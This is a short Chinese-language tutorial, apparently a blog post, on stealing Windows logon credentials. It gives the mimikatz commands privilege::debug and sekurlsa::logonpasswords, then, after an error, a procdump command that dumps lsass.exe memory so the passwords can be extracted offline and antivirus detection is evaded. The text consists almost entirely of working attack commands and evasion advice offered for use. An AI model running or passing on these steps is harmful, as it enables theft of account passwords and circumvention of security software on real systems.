首先打开mimikatz_trunk2.0
在DOS运行界面中输入privilege::debug提权命令1
我们提权成功后,我们再来输入sekurlsa::logonpasswords抓取密码命令
但是出现错误,如下图
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsIiclRnblN2XjlGcjAzNfRHLGZkRGZkRfJ3bs92YsYTMfVmepNHL0MGROh3Yq50dRpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnLyYzNxIjMzMjM5IDOwAjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
网上搜索了一下,我决定使用procdump结合mimikatz实现免杀效果,procdump是微软的官方工具,不会被杀.
首先在任务管理器找到lsass.exe,右键创建转储文件
用procdump导出lsass.dmp后拖回本地抓取密码来规避杀软。
命令:
Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
注意点:
使用管理员权限打开DOS窗口
*需将lsass.dmp移到procdump64.exe同目录